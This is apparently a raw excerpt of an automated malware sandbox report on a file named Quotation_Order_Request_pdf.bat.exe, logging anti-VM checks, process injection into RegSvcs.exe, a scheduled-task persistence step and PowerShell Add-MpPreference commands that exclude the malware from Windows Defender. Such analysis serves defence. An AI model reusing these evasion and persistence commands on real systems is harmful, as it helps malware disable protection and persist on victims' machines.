Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bCirqu.exe PID: 7256, type: MEMORYSTR

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory allocated: 18A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory allocated: 33F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory allocated: 53F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory allocated: 8CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory allocated: 9CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Memory allocated: 830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Memory allocated: 4390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Memory allocated: 7850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Memory allocated: 8850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Memory allocated: 8A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Memory allocated: 9A20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6369	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 405	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6555	Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe TID: 7076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608	Thread sleep count: 6369 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608	Thread sleep count: 405 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

8_2_00403D74

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}hP
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1779501663.0000000007BF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: E#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000
Source: RegSvcs.exe, 00000008.00000002.2947698594.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040317B mov eax, dword ptr fs:[00000030h]

8_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00402B7C GetProcessHeap,RtlAllocateHeap,

8_2_00402B7C

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe"
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bCirqu.exe"
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bCirqu.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BAA008	Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bCirqu.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpD23C.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
